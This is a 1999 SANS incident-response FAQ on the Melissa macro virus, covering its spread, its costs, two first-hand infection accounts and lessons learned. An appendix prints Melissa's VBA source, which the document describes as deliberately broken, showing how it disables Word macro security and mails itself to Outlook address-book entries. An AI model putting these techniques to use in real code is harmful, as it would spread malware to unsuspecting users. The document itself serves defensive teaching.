Get a MacBook Air with Online Courses - OFFER EXPIRES DEC. 3!

Intrusion Detection FAQ: What was the Melissa virus and what can we learn from it?

(This was originally released as:SANS Flash Report - Melissa virus, March 28, 1999 Ė Last updated April 22, 1999, Editor Ė Stephen Northcutt)

Table of Contents
:
  1. What Melissa teaches us
    1. Infection Speed
    2. Collateral Damage
    3. Need for Defense in Depth
  2. One site's Melissa Infestation
    1. Userís Story
    2. Security Manager Leads Cleanup
  3. Conclusion and Lessons Learned
  4. Appendix: Melissa Source Code
The Melissa macro virus was first observed Friday March 26, 1999 and quickly became the most well known and widely spread macro virus infection to date. This flash report was originally released to supplement available CIRT and FIRST team resources. It has been updated to focus of the lessons learned from the event and to serve as a planning tool for the future.

Many sites were aware of Melissa on Friday, others over the weekend and of course, still others found Monday morning, March 28, to be a challenging day. By late Friday, an excellent description of the virus, including how to identify and contain it at the host level had been developed and published by the Computer Emergency Response Team at Carnegie Mellon. This document is available at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html

Major anti-virus vendors have already released descriptions and anti-viral signatures. URLs for NAI and Symantec are listed below:

http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

http://www.symantec.com/avcenter/venc/data/mailissa.html

SANS applauds the work done by these organizations as well as other CIRT and FIRST teams whose rapid response helped keep this from becoming an even larger problem.

The focus of this document is on the lessons learned and also the bigger picture from the Melissa Macro virus. We will discuss the implications raised by the speed of infection, the impact from a user and also from a security managerís point of view of an infection and finally, some lessons learned on based on the experiences of userís who replied to the original Flash report.

1. What Melissa teaches us

The Internet was not truly prepared for Melissa, the number of affected sites is a warning that we had best learn. In this section we will consider some of the implications of this virus. In the conclusion we will also consider lessons learned, but these are based on the responses of readers from the first Flash report.

1.1 Infection Speed

According to NAIís web site, the virus was first discovered on an "alt.sex" newsgroup and spread rapidly. This serves as a warning how fast a virus with an unknown signature can spread. A modified, non-operative copy of the source code is included as an appendix to this document. If you search for the string "For y = 1 To DasMapName.AddressLists.Count", you can see how the virus replicated so rapidly by going through Microsoft Outlook address books and sending itself to the first 50 entries in each book. The most well published sections of the code are marked with comments that begin with ***.

Of course all the copies in the world are to no avail if they donít have anywhere to go. Though address books will have some errors, on the whole the point to active accounts which proved to be fruitful targets.

In the March 02 webcast, (http://www.sans.org/webarchives.htm) Stephen Northcutt discussed another MS Word Macro Virus, M97.Marker.a. This virus is an information gathering virus. Marker sends the Microsoft Office registration information of infected systems outside organizations via FTP. Northcuttís point was that this would allow a prospective attack to develop an infection map and by knowing who sends what to who, to target future rapid, focused attacks. Melissa wasnít targeted, but it certainly was rapid.

As a community we need to learn the lessons that Marker and Melissa teach, neither virus was destructive. They are both quite different, their primary similarity is that they are Macro viruses. However, they both serve as a warning shot, a heads up for security professionals to reconsider the risks of the macro virus threat vector. With a few adjustments in the source code either virus could have caused significant damage to organizations.

1.2 Collateral damage

The Melissa virus did no damage in the sense of deleting, or stealing files; only sites with desktop systems running Microsoftís Outlook email client were directly affected. However, even systems that did not spread the virus directly by email still had their Microsoft Word documents infected and continued to pass on the virus. Moreover, the cost of dealing with Melissa is in the millions of dollars. How did a virus that does no explicit damage wreak so much havoc? The financial losses are mostly in the area of lost productivity:
  • Some sites have reported that they shut down electronic mail entirely for multiple days
  • Many sites lost email connectivity for several hours while cleaning the virus from their servers.
  • System administrator and help desk resources where tied up fighting the virus for periods ranging from three Ė five days at most affected organizations.
One network engineer, who worked at one of the first sites to report the problem on Friday March 26, said "I knew something was wrong before I knew what was wrong. I could feel the network going slower and slower. As I looked into it, I found the exchange mail servers were melting down." Again, one of the lessons of Melissa is that a macro virus can hit us all very fast and very hard.

1.3 Need for defense in depth

Though Melissa was primarily spread by e-mail, passing an infected floppy disk worked just as well to move the virus to a new system, possibly even a new organization. This means that a single line of defense such as a content checking firewall might be easily circumvented. Sites discovered that the more defensive layers they had deployed, the more options they had. These defensive layers included virus checking at firewalls, servers and desktops, as well as email filters, quick hacks, and special cleaning programs.

Several creative, short term, "band-aid" solutions were developed to slow the spread of the virus. These quick hacks are reminiscent of the guy who saved his home from burning during the Malibou wild fires by standing on his roof spraying a garden hose. We can call him crazy, but his house stands unburned today. The primary electronic mail filter that was made available did its work by searching for Melissaís signature subject line, "Important Message From ". This worked and certainly helped get Melissa under control, though it certainly helped that variant Melissaís were not released early in the attack with different subject lines. Another band-aid that was tried by some organizations was to create fifty or more blank lines at the beginning of Outlook address books. It is easy to criticize band-aids as unsophisticated, but when you have to deal with a cut, a band-aid sure can be handy!

Several sites have reported they were unable to apply either the sendmail filter, or firewall based scanners because they didnít have the latest version of software. Monday morning, March 28 was too late to update software, the Internet feeds for the antivirus companies were saturated by clients all over the Internet trying to download updates to their virus signatures.

Virus scanning at the firewall, on servers and on the desktop systems as well as physical entry points for magnetic media are recommended for sites that want to avoid the kind of punch Melissa exhibited.

2. One siteís experience

One of the hidden costs of Melissa, is the impact on people. Here we present two stories from an infected site from two points of view, a user who received and opened the attachment and the security manager who led the cleanup at the site.

2.1 A Userís Story

"As I composed the last email of the day, a message hit the Inbox of my Microsoft Outlook email application. The subject line read: "Important Message From [Jane Doe]". I viewed the message, and the body read "Here is that document you asked for... don't show anyone else ;-)"

Attached was a Microsoft Word document titled "list1.doc".

"Although I hadn't requested any documents from [Jane Doe], I was expecting a couple of them from other people. It wasn't inconceivable to think that she had become involved, even though I didn't know who she was. I double-clicked on the Word document. A pop-up window appeared, warning me that a macro was contained in the document, and that macros can potentially be dangerous. I knew that... :-) So, I shut down the Word application, and checked the document with several of the virus detection packages that I had. Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted source, I went ahead and opened the document with the macros enabled. In less than a second, a duplicate of the message had hit my mailbox, this time with my name attached. I hit the power-off button on my computer, but it was late. The payload had been delivered. My name was now attached to a file containing pornographic web sites, and an apparent username and password for each site. Moments later, duplicate messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This virus (or worm) was snowballing fast, too fast. I immediately called our information systems security manager, only to find that his phone was already busy. I left a voicemail detailing my appraisal of the situation, and my fear that this incident could get serious... very quickly. What I didn't know was that I was too late, it was already *very* serious."

This user now realizes that opening a file from a user he didnít know with an attachment pertaining to something he didnít know about and then allowing the macroís to execute was a serious error. Hopefully we can all learn from it!

2.2 A security managerís story

"As soon as we discovered the virus late Friday afternoon, we disconnected our servers (all SMTP relays and Exchange servers at our Internet connection) from the network until we could contain the infection. This happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange servers worked through Friday night and well into Saturday. Many returned Saturday and again on Sunday to complete the isolation and cleanup. They cleaned up the Exchange servers with updated anti-viral signatures as soon as they were available. The corporate servers and one departmental server were ready to come back on-line late Sunday. We left IMS (Internet Mail Service) disabled until we could contain (filter) email at the SMTP server.

"Our version of sendmail is one removed from the latest and filter updates provided by the author would not work on our version. We resorted to getting the word out for ALL users to update the AV signatures and refrain from sending Word docs until any with macros had been identified as coming from trusted sources. The administrator for the SMTP relay host downloaded a trial version of InterScan VirusWall from TrendMicro. For more info, see: http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many things in our favor:
  • System administrators were still at work when the problem started (approximately 1640 on Friday).
  • Most of the users were gone for the weekend (and didn't compound the problem by manually sending additional copies of the infected document).
  • All of the system administrators involved in the clean up had been trained in incident handling.
  • The person who needed to make key decisions was trained in incident response and had already begun carrying a cell phone.
  • Base commanders recognized the expertise that was in use and supported the Incident Handling team by not directing what needed to be done (at least so far)."
Note: The incident handling process used by this site is based on six stages of incident handling: preparation, identification, containment, eradication, and follow-up. The URLs at the beginning of this document can help you with identification and eradication. Your organization may need to consider email server down time in order to achieve containment. You may also want to consider setting up non-email communication channels for your organization. If you do not know how to build a telephone call tree, look for a "soccer mom". They know how to spread important information very efficiently. In this way, if you do suffer an email meltdown, you can still get important information, such as where to acquire the latest anti-virus software, to your users.

3. Conclusion and Lessons Learned

Because Melissa exploited one of the most valuable benefits of the net -- the ability to share documents -- to propagate and to multiply itself, it affected more people and spread faster than earlier viruses. The silver lining in this cloud is that a relatively benign virus like Melissa was an effective way of gaining user and organizational awareness. Just about every organization on the Internet learned something about incident handling and how dependent on Internet services they are. The organizationís that learn from Melissa will be stronger and better prepared to deal with whatever comes next. After reviewing the comments from users and debriefing organizations, here are some of the primary lessons learned from the experience:
  1. Keep your defensive software up to date. Users have reported being unable to install the filter from sendmail.com because they were running older versions of sendmail. Userís of TrendMicroís VirusWall that were not running the latest version have reported the same problem. Virtually everyone on the Internet was caught with out of date anti-virus signature tables. For sites with round the clock staffing, it may be advantageous to consider downloading new anti-virus signature tables on Sunday evening as a standard practice.
  2. The danger of macros. Many of the users who responded to the initial flash report have commented on the risk of macros. It will take a long time for benign applications of macros will make up the lost productivity caused by Melissa. If your site has the ability to scan content at the firewall, you may want to consider stopping files that contain macros, unless these are important to the conduct of your business.
  3. Established incident handling procedure. Many sites were caught flatfooted by Melissa. The success of this attack may stimulate otherís to try to top Melissa and release more harmful programs. Organizationís should learn from their response to Melissa and begin to develop formal incident handling procedures. These should include training for user awareness of what to look for, whom to call, and what to say when they call about a security threat.
We want to hear your experiences and lessons learned. Please send your tips, tricks, techniques, experiences and lessons learned to info@sans.org with Melissa in the subject line. If we share, we can learn from this and be in a better position the next time an event like this occurs.

Appendix: Melissa Source Code

NOTE: Several errors have been introduced into this copy of the code as a safety measure so that this will not run as is. Also some sections have been removed. We hope this will not overly impact your opportunity to understand how the software works, but could not be responsible for furthering live version of Melissa. Text comments have been inserted at the "famous" locations preceded by three asterisks "***"

*** Begins by checking security, the environment, and whether already infected

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo" Then
If UngaDasOutlook = "Inlook" Then
DasMapName.Logon "profile", "password"
For y = 1 To DasMapName.AddressLists.Count
Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakOffASlice.Recipients.Add Peep
x++
If x < 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakOffASlice.Subject = "Important Message From " &Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for
... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From" This could change of course in future versions ***

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by
Kwyjibo"
End If
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo END
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document")
= False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for using all my letters.
Game's over. I'm outta here."
End Sub

*** The lines above are some of the most published information about this virus. Though you can set intrusion detection and other string matching security tools to look for keywords like "Kwyjibo", simple modifications of the code could change these. ***